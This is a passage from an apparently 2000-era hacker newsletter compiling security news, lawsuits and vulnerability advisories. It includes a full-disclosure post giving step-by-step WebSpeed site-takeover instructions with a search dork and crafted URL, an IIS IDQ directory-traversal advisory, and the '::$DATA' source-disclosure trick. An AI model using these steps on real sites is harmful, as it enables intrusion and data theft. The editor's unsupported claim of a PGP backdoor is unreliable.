community's attempt to patrol child pornography to picketers in front of a porn store. It's well-intentioned, but it won't change anything. "My recommendation is that this is not the job for a layman, quite simply," he said. "That's why we pay taxes." @HWA 26.0 SCRAMDISK (Windows) on the fly encryption for your data. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This isn't new, but it is a VERY good package, several of my colleagues and myself use it for sensitive material on our winboxes. The bonus is, its free software and will offer sufficient protection of data for most users. This is especially useful for using personal data on your drives at work and hiding it from the boss, its like having your own (secret) hard disk in your work's machine. The other uses are obvious. A note about PGP, the latest versions have a BACKDOOR that allows federal agencies access to your data. Use an earlier version of PGP (4.2) if you want to make things harder for federal agents to access your data(!) - Ed The walls have ears, the net has taps, the government (not just your own) IS listening and scanning your data, so protect your privacy and use PGP for sensitive emails or data transmissions, also use SSH instead of telnet for accessing your shell accounts if possible as many sites are sniffed by hackers daily. - Ed http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html 5/1/2000 ScramDisk - Disk Encryption Tool Details Scramdisk is a program that allows the creation and use of virtual encrypted drives. Basically, you create a container file on an existing hard drive that is locked with a specific password. This container can then be mounted by the Scramdisk software, which creates a new drive letter to represent the drive. The virtual drive can then only be accessed with the correct pass phrase. Without the correct pass phrase the files on the virtual drive are totally inaccessible - even physically extracting the data will reveal nothing (since the contents are encrypted). Once the pass phrase has been entered correctly and the drive is mounted, the new virtual drive can be used as a normal drive; files can be saved and retrieved and you can safely install applications onto the encrypted drive. Scramdisk allows virtual disks to be stored in a number of ways: 1. In a container file on a FAT formatted hard disk. 2. On an empty partition. 3. Stored in the low bits of a WAV audio file (this is called steganography). This last option is especially interesting, since this WAV file can be sent by e-mail or carried on a diskette without attracting too much attention (since by casual hearing the WAV file sounds like the original sound file). Details: Scramdisk can create virtual disks with a choice of a number of 'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1, Blowfish, TEA (either 16 & 32 rounds), and Square. It also includes a proprietary and very fast algorithm 'Summer' which is provided for minimal security applications and for compatibility with older versions of ScramDisk. Why not use PGP? PGP is a great program, but it doesn't allow the on-the-fly encryption of a disk's contents. Instead users have to: 1. Decrypt the existing file 2. Work on the data 3. Re-encrypt the data The problem is, while the file is decrypted it is vulnerable to interception. Scramdisk is complementary to PGP; PGP is excellent for communication security, but is somewhat lacking user friendliness when used for data storage security. Flaws in the system Scramdisk is not totally secure (and nor is any security program!). There are a number of ways an attacker may try infiltrating your system: 1. Look for applications that leak data. A very well known word-processor has an interesting bug that leaks parts of the raw contents of the disk when saving an OLE Compound Document. 2. Look for data that isn't deleted securely. Ok, everyone knows that you can undelete a file easily. Did you know that even a file that has been 'wiped' could potentially be recovered by looking at the surface of the disk? Deleted files should be securely wiped using an appropriate program (PGP v6+ contains a secure file wiping program). 3. Look for data that has leaked in other ways. Temporary files and the swap file spring to mind. These both need to be securely erased too. 4. Using Van Eck monitoring. Basically, electrical emissions from the monitor, hard drive and even keyboard can be detected and recorded from a distance away. This may allow an eavesdropper to see what's on your screen or detect your pass phrase as you type it. 5. Brute Forcing. This can happen in a number of ways: they can try brute-forcing your pass phrase (its important to use a large pass phrase that isn't easily guessed, it helps to use both upper and lower case and numbers as well) or they can try to brute force the algorithm. This is hard work (and will take around 2^127 operations with most of the ciphers included with ScramDisk - DES & Summer are exceptions). 6. Some of the ciphers included may be susceptible to attacks not known about in public. The NSA/GCHQ may have a mechanism faster than brute-force of attacking the algorithms. Scramdisk does not include any weak algorithms in the original distribution (apart from Summer, which is included for backwards compatibility), but who can tell what the Intelligence Agencies can do with Blowfish, IDEA, 3DES et al? 7. Install an amended version of ScramDisk on your computer that secretly stores your pass phrase so that it can be later read by a CIA agent. (Or use a program like SKIn98 to do it!) Far fetched? Possibly, but you should be aware that this kind of attack exists. There is no real way to defend this attack. Check the PGP Signatures of the ScramDisk files against the executables on your computer, but could your copy of PGP have also been amended? 8. Beating you until you spill your pass phrase. Truth drugs also work, apparently. The software can be downloaded free of charge from: http://www.scramdisk.clara.net/ @HWA 27.0 HNN:Jan 17: MPAA files more suits over DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hackernews.com/arch.html?011700 MPAA Files More Suits over DeCSS contributed by Project Gamma and Macki In an effort to stop further distribution of the DeCSS program the Motion Picture Association of America has filed lawsuits in federal courts. This follows similar action two weeks ago by the DVD industry association. The MPAA feels that allowing potential illegal copying of DVDs with the DeCSS the program would be a violation US copyright law. Wired http://www.wired.com/news/politics/0,1283,33680,00.html ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn CNN has some interesting quotes from a Warner Home Video spokesperson regarding this hole mess. CNN - Look about halfway down http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html MPAA has a few interesting things to say as well. MPAA http://www.mpaa.org/dvd/content.htm The folks over at CopyLeft have come up with a T-shirt that has the source code to css_descramble.c printed on it. (Cool, and only $15) CopyLeft http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back ** These are really neat, check em out.. - Ed 2600 has posted the story of what has happened to them since their involvement began including them being named as a defendant in the case. 2600.com http://www.2600.com/news/2000/0115.html OpenDVD.org is attempting to cover all the developments (and doing a damn good job) in this case including the scheduled injunction for January 18, 2000. OpenDVD.org http://opendvd.org/ Articles: Wired; Movie Studios File DVD Hack Suit Reuters 5:20 p.m. 14.Jan.2000 PST The seven largest US movie studios filed their own lawsuits Friday to prevent several Internet sites from distributing a program that could allow copying of DVD movies. The lawsuits, filed in federal courts in New York and Connecticut, followed a broader lawsuit filed last month in state court in California by a DVD equipment manufacturers group. At issue is a program called DeCSS, written by a Norwegian programmer, that allows users to bypass the encryption scheme used on DVDs to prevent unauthorized copying. But many Internet users and programmers say the software had a simpler, less insidious goal. They said the program was needed to allow people to watch DVD movies on computers running the Linux operating system. The studios argued that by allowing potential illegal copying, the program violated US copyright law. They asked the courts to prohibit four people from distributing the program on their Web sites. A spokesman for the Motion Picture Association of America, the studios' lobbying group, said the Web sites involved were dvd-copy.com, krackdown.com and ct2600.com. Dozens of other Web sites have also carried either the program or source code instructions showing how to write the program. "This is a case of theft," said Jack Valenti, president of the association. "The posting of the de-encryption formula is no different from making and then distributing unauthorized keys to a department store." The people who posted the code said they had done nothing wrong, insisting that the program was meant to allow viewing of DVD movies under Linux. "I don't have illegal copies of movies on my site," said Shawn Reimerdes, a computer programmer who maintains the dvd-copy.com Web site. "Just posting these files shouldn't be illegal." Internet advocacy groups have also opposed the lawsuits, arguing that the posting of computer codes on a Web site is a form of speech protected by the First Amendment. "This is definitely an infringement on freedom of speech," said Shari Steele, director of legal services at the Electronic Frontier Foundation, a San Francisco -based cyber-rights advocacy group. "What has been done was totally legal. Posting of the program is legal and there are no pirated movies here." Chris DiBona, who promotes Linux use for VA Linux Systems, said the industry had refused to help create a program to play DVDs under Linux. "The whole reason this happened is because the movie industry itself didn't support Linux," DiBona said. "They thought they could keep this a secret. They failed." The lawsuit relied on the 1998 Millennium Digital Copyright Act, which outlawed the distribution of products designed to crack copyright protection schemes. "If you can't protect that which you own, then you don't own anything," MPAA's Valenti said. In the California case, the court last month turned down the industry's request for a temporary restraining order against a much wider array of defendants, many of whom had only provided a link on their Web page to a page containing the actual program. A hearing is scheduled for next week. Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt Disney, Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom, Sony's Sony Pictures Entertainment, News Corp.'s Twentieth Century Fox Film, Universal Studios, a unit of Seagram, and Warner Bros., a unit of Time Warner. -=- MPAA; 404 - sorry article vanished. @HWA 28.0 WARftpd Security Alert (Will they EVER fix this software??) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://war.jgaa.com/alert/ SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS Updated February 4th 2000 13:30 Central European Time. January 5th 2000, a seriuos security problem with War FTP Daemon 1.70 was reported by email. Two hours after I read the mail, a security alert was sent to the war-ftpd mailing list, the alt.comp.jgaa newsgroup and the bugtraq mailing list. The alert adviced all server operators to take the server off-line until further notice. Brief overview War FTP Daemon 1.70: The bug allows unrestricted access to any file on the local machine also for users that have not logged on. If an older ODBC driver is installed, the bug also gives users unlimited access to all system commands, with administrator privileges (this is a bug in ODBC that has been fixed in recent versions). The advice is to take all version 1.70 servers off-line until the server is upgraded! A bugfix (War FTP Daemon 1.71) was released January 8th 2000 14:40 CET. This version is not completely tested yet. Please report any serious problems to jgaa@jgaa.com. I Will fix bugs in 1.70 over the next few weeks to make 1.70 a little more comfortable to use while we wait for version 3. War FTP Daemon 1.67b2 and previous versions: The bug may give privileged uses unrestricted access to some files. Users must be logged in, and have at least write or create permissions. Users can not execute commands. A bugfix was released less than 24 hours from I read the mail that reported the problem. Buffer overflow problem in 1.6* February 2nd 2000 there was reported a buffer-overflow problem in 1.6 versions on BUGTRAQ. The problem does not seem to compromise the security, but the server can easily be crashed by remote attackers, after they have logged in. A fix was released February 3rd 2000, about an hour after I read about the problem. Bugfixes are released at ftp://ftp.no.jgaa.com and http://war.jgaa.com/alert/files I'm sorry for any inconveniences caused by these problems. General news War FTP Daemon 1.67. I will make a new full distribution for 1.67. Until this is ready, 1.65 must be installed, and then upgraded. War FTP Daemon 1.72 service release. I will make a service release of the 1.70 series in the near future. Some annoying bugs will be fixed, and a command-line utility to add user accounts interactively, or from scripts, will be released. There will also be a simple DLL wrapper interface for easy integration with other software. War FTP Daemon 3.0. The development of the next major release continues. 3.0 is currently running under Windows NT and Linux. The server is however not yet ready for alpha-testing. When all the basic functionality is implemented, and debugged, ftp://ftp.jgaa.com will open up, using version 3.0. This can be expected soon. Early versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be available for download. Version 3.0 will be Open Source, under the GNU Public License. http://download.jgaa.com will open when War FTP Daemon 3.0 moves into early alpha. Jarle @HWA 29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mack MSNBC found seven ecommerce sites open for business with easily accessible customer databases. By connecting to weakly secured SQL databases MSNBC was able to access the personal information including credit card numbers of 2500 people. All of the sites have been informed of the problem. (And people act surprised when I tell them that I don't buy anything on the web.) MSNBC http://www.msnbc.com/news/357305.asp Stealing cards easy as Web browsing By Bob Sullivan MSNBC Jan. 14 — Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site. CREDIT CARD THEFT, a problem long lurking in the background of Internet commerce, leaped to the top of consumers’ minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe’s database of user credit cards. There’s still speculation about how he did it. But perhaps Maxus didn’t have to work so hard. This week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web — the databases were using the default user name and in some cases, no password. These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response. “From our point of view this is just unprofessionalism in a very high degree that’s not explainable,” Prokhorov said. His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren’t looking to find security flaws, but rather stumbled on these. “This is just a hole we passed by, an open door. Our people were amazed.” But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures. “This is a microcosm of what’s out there,” said Elias Levy of SecurityFocus.com. Levy’s site was the first to report the CD Universe break-in last weekend. “One could only imagine what they would have found if they were looking for problems.... The problem is fairly widespread, and what Anatoliy has found is a small snapshot.” Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation. The security flaws Prokhorov found involve more than just easy-to-steal credit cards. At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers. Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers — in each case, they were running Microsoft’s SQL Server software — or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.) Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net — were all contacted 24 hours before this story so they could close the security hole. While the flaws are obvious, assessing blame is a much more sticky business. There’s a mounting concern that small businesses are particularly vulnerable to attack; many don’t have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don’t deliver. Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places “::$DATA” at the end of the page’s Web address. That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole. But even without knowing that technique, an intruder could have entered the sites anyway — the username required for entering the database was the default “sa,” which stands for “system administrator”; the password was the name of the company. “We used a developer, and obviously the developer didn’t take that flaw into consideration,” said a spokesperson for the sites. “The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn’t do, we didn’t hire a security company to come in and test our Web site.” Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list. “Make a condition of the contract that it has to pass scrutiny of another individual who tests the site,” Cooper recommended. The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. “So a lot of people end up with a working site but not a secure site.” The other three vulnerable sites MSNBC visited simply used “sa” as the username for their database, and no password. Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated. “The blame falls on more than one person. You can’t rush out to set up an e-commerce site regardless of how much you want to make money. ... Many people don’t give (security) a second thought,” he said. One of the fundamental flaws in all these sites — and, experts say, in many other sites — is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it’s often kept on a computer in plain text — one step away from the Internet. While that’s more convenient, experts agree it’s a bad idea. “My advice is, if nothing else, don’t store the data where it physically has access to the Web,” said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. “Take them off every night and make a sneakernet run.” As for consumers, there isn’t much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank. MSNBC’s Curtis Von Veh contributed to this story. @HWA 30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by tom It is alleged the a team of sophisticated professional electronic intruders have broken into twelve multinational companies and have issued ransom demands to prevent the release of stolen information. This report only names one of the company's in question, Visa, and says that Scotland Yard is investigating. (While it would appear that Visa has admitted to the intrusion we would like know who the other companies are.) The UK Times http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999 January 16 2000 BRITAIN Hacker gang blackmails firms with stolen files Jon Ungoed-Thomas and Stan Arnaud A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to Ł10m and is also suspected of hiring out its services. Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator. Visa confirmed last week that it had received a ransom demand last month, believed to have been for Ł10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI." It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly Ł1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds. "We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in." Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland. Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company. He has been interviewed by detectives and Visa security experts. It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future." Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker. Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system. They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation. The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files. Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group." @HWA 31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SUCK THIS! From HNN http://www.hackernews.com/ contributed by deeeek Telstra (Australian Telephone Company) has to upgrade 29,000 payphones due to fraud involving a drinking straw. The problem affects 80% of the pay phones installed since 1997. No information about exactly how the fraud was committed was given. (A Straw? Oh, there must be a text file on this somewhere.) Fairfax IT http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html Scam forces Telstra to fix 29,000 pay phones 9:17 Friday 14 January 2000 AAP TELSTRA is urgently modifying 80 per cent of its public pay phones after a scam was discovered involving a drinking straw and free phone calls around the world. Telstra would have the 29,000 vulnerable phones rectified soon, Telstra's public affairs manager Michael Herskope said yesterday. The Spanish-manufactured coin and phone card-operated Smart pay phone was phased into the Australian network from 1997. The scam potentially cost Telstra millions of dollars in unlimited STD and ISD calls since then, but Telstra can only speculate. "We have a rough idea, but that's not something we're really going to publicise,'' Herskope said. The scam was made public on the front page of Albury-Wodonga's The Border Morning Mail yesterday. The newspaper was told by perpetrators that the low-tech scam had been well known since the phones were introduced as part of a $100 million upgrade of the public phone national network. One source said some people may have learnt about it from the Internet. The paper accompanied a man to three public phones chosen at random and observed him make free calls, including one to New York. Telstra had initially dismissed the scam as a myth, the paper said. But Herskope denied that Teltra only learnt of the fraud from the country newspaper. "We've known about it for a little while,'' he said. "It's pretty hard to articulate weeks, days. I'm not sure how it was brought to our attention but it certainly was.'' He said rectifying the problem was a simple procedure. Without disclosing how the fraud was perpetrated, he said there was no design fault in the phone. "This particular fault will be closed off very shortly,'' he said. @HWA 32.0 Owning sites that run WebSpeed web db software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: win2k security advice mailing list. From: George To: Sent: Friday, February 04, 2000 7:32 PM Subject: Webspeed security issue leaves sites vulnerable I reported this to Progress (maker of Webspeed) a month ago and they said they would fix it but since then I've not seen any fixes released. I also pondered whether or not to release this information because some rather large web databases use Webspeed but I do believe in full disclosure as the best security so here goes... Webspeed is a website creation language used by some of the larger db based websites on the net. Version 3 comes with a java GUI configuration program. This configuration program has certain security setting options in it. One of which doesn't actually do anything. There is one option to turn off access to a utility called WSMadmin. It's in the messenger section of the GUI config program. However checking or unchecking this option doesn't change anything. In fact to turn this feature off you have to hand edit the ubroker.properties file. Look for the following entries: AllowMsngrCmds=1 and each time you find this set it =0 in each of the sections. This will disable the feature (you want to do this on the production server). AllowMsngrCmds=0 Ok, now the exploit to show how serious an issue this is on the web. It's just a misconfiguration really but it's caused by a bug in the java config program (I tested the NT version but since the config program is java it may also affect other platforms) Exploit: go to search engines and search for "wsisa.dll", I used google 3rd page or further (first 3 pages are all junk) Go to URL similar to http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm with your browser change the url in the browser to http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin (note capitals are important) click on the link "End Sessions Logging and Display Sessions Info" (note you may have to start logging first then stop it if they've never used the logging feature) When you pick the End Sessions Logging choice it displays the log, find a statement in the log for the default service "Default Service = nameofservice" back up one page (hit your back button) type nameofservice into the Verify WebSpeed Configuration box and click the verify button. If everything worked you now own their site. I won't explain how to use the utility but anyone familiar with this should know exactly how dangerous this is. Geo. _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 33.0 Cerberus Information Security Advisory (CISADV000202) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cerberus Information Security Advisory (CISADV000202) http://www.cerberus-infosec.co.uk/advisories.html Released : 2nd February 2000 Name : IDQ Affected Systems : Microsoft Windows NT 4 running Internet Information Server 3 or 4 Issue : Attackers can access files outside of the web virtual directory system Author : David Litchfield (mnemonix@globalnet.co.uk) Description ********* Any web site running Internet Information Server 3 or 4 and using Internet Data Query files to provide search functionality on the site may be exposed. IIS also comes with some sample IDQ scripts that are vulnerable so any website with these sample files left on are at risk. Using these IDQ scripts or even custom scripts it is possible to break outside of the web virtual root and gain unathorized access to files, such as log files and in certain cases the backup version of the Security Accounts Manager (sam._) It does require for the attacker to know the path to the file, for the file to be on the same logical disk drive as the IDQ file and for ACL to allow read access to the anonymous Internet account or the Everyone/guests group. Details ***** The extent of this security hole depends upon whether the recent "webhits" patch has been installed. See http://www.microsoft.com/technet/security/bulletin/ms00-006.asp If the patch has been installed there is still a vulnerability - however, those that have not installed this patch are most at risk. Microsoft are re-releasing this advisory and the updated patch. Please note that Windows 2000 does not seem to be vulnerable to this. Cerberus' vulnerability scanner, CIS, has now been updated to check for this issue. For those that already have a copy of the scanner you can download the updated module from http://www.cerberus-infosec.co.uk/webscan.dll - however those that do not yet have the scanner, if you would like a copy please go to http://www.cerberus-infosec.co.uk/ and follow the Cerberus Internet Scanner link on the frontpage. If the "webhits" patch HAS NOT been installed ************************************ Any idq file that resolves remote user input for any part of the template file is dangerous. eg: CiTemplate = %TemplateName% The ISAPI application that deals with IDQ queries is idq.dll and it will follow double dots in paths to template files, meaning an attacker can break out of the web root. If the idq file appends .htx to the CiTemplate eg: CiTemplate=/iissamples/issamples/%TemplateName%.htx some may think this will limit attackers to viewing only .htx files. Not so. Quoting from the Index Server documentation (/iishelp/ix/htm/ixidqhlp.htm), "Index Server does not support physical paths longer than the Windows NT shell limit (260 characters)." Due to this limit it is possible to append lots of spaces onto the name of the file we want to read and thereby pushing the .htx out of the buffer and we're served back the file. IDQ files known to be at risk in one way or another: prxdocs/misc/prxrch.idq iissamples/issamples/query.idq iissamples/exair/Search/search.idq iissamples/exair/Search/query.idq iissamples/issamples/fastq.idq There are may be more. If the "webhits" patch HAS been installed ******************************* Machines that have had the patch installed will only be vulnerable if the IDQ file does not specify a .htx extention eg: CiTemplate = %TemplateName% and CiTemplate = /somedir/otherdir/%TemplateName% are vulnerable whereas CiTemplate = /somedir/otherdir/%TemplateName%.htx is not vulnerable. Solution: ******* Review your IDQ files to determine if you are at risk. If so edit them and use hardcoded template files. eg CiTemplate=%TemplateName% to CiTemplate=/your-virtual-directory/your-htx-file.htx and then edit your search form to reflect this change. Remove any sample files from the system - not just idq files. Apply the updated patch. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd ------------------------------------------------------------------------ Delivery co-sponsored by Trend Micro, Inc.: http://www.antivirus.com. ScanMail for Microsoft Exchange * Stops viruses from spreading through Exchange Servers. * Eliminates viruses from email in real time, even unknown macro viruses * Filters spam (unsolicited junk email). * Sends customized virus warning messages to specific parties and admins * Remote installation and management via web or ScanMail's Windows GUI ------------------------------------------------------------------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 34.0 Security Focus Newsletter #26 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #26 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Multiple Vendor BSD /proc File Sytem Vulnerability 2. DNS TLD & Out of Zone NS Domain Hijacking 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability 4. VMware Symlink Vulnerability 5. HP Path MTU Discovery DoS Vulnerability 6. Microsoft East Asian Word Conversion Vulnerability 7. NT RDISK Registry Enumeration File Vulnerability 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability 9. NT Index Server Directory Traversal Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow 2. Vulnerability Patched: NT Index Server Directory Traversal 3. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 4. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow 6. Vulnerability Patched: NT RDISK Registry Enumeration File 7. Vulnerability Patched: Microsoft East Asian Word Conversion 8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) 3. Task Force Battles Online Criminals (Wed Jan 26 2000) 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) 5. Visa acknowledges cracker break-ins (Fri Jan 28 2000) 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) V. INCIDENTS SUMMARY 1. Got scanned again (Thread) 2. Unusual scan pattern (Thread) 3. Possible Probe = Possible Malfunction (Thread) 4. No Idea (Thread) 5. PC Anywhere client seems to probe class C of connected networks (Thread) 6. unapproved AXFR (Thread) 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) 8. Anti-Death Penalty (Thread) 9. Strange DNS/TCP activity (Thread) 10. eri? (Thread) 11. source port 321 (Thread) 12. Korea (again) (Thread) 13. BOGUS.IvCD File (Thread) 14. port 768 (Thread) 15. Extrange named messages (Thread) 16. Probes to tcp 2766 ('System V Listner') (Thread) 17. Possible attempt at hacking? (Thread) 18. DNS update queries: another sort of suspicious activity. (Thread) VI. VULN-DEV RESEARCH LIST SUMMARY 1. Shadow (Thread) 2. things to break.. (Thread) 3. HTTP scanners? (summary, long) (Thread) 4. CGI insecurities (Thread) 5. ICQ Pass Cracker. (Thread) 6. File Share Vacuum (Thread) 7. IIS4.0 .htw vulnerability (Thread) 8. Napster a little insecure? (Thread) 9. distributed.net and seti@home (Thread) VII. SECURITY JOBS Seeking Employment: 1. Prashant Vijay (Summer Internship) Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) 2. Practice Manager w/PKI experience NYC, Philly or DC) 3. Lead Security Engineer - Bay Area/San Jose 4. Senior security engineers - Bay Area/San Jose 5. Virus coder wanted (San Antonio, TX) 6. Junior Security Engineers Needed (Maryland) VIII. SECURITY SURVEY RESULTS IX. SECURITY FOCUS TOP 6 TOOLS 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) 2. SecurityFocus.com Pager (Win95/98/NT) 3. lidentd 1.0p1 (Linux) 4. Cgi Sonar 1.0 (any system supporting perl) 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) 6. Secret Sharer 1.0 1.0 (Windows 95/98) X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. INTRODUCTION ----------------- Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for the time period of 2000-01-24 to 2000-01-30 sponsored by CORE SDI. CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assesment and security infrastructure consulting for a large number of government and fortune 500 companies in both North and Latin America. http://www.core-sdi.com II. BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------- 1. Multiple Vendor BSD /proc File Sytem Vulnerability BugTraq ID: 940 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/940 Summary: Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host. The proc file system was originally designed to allow 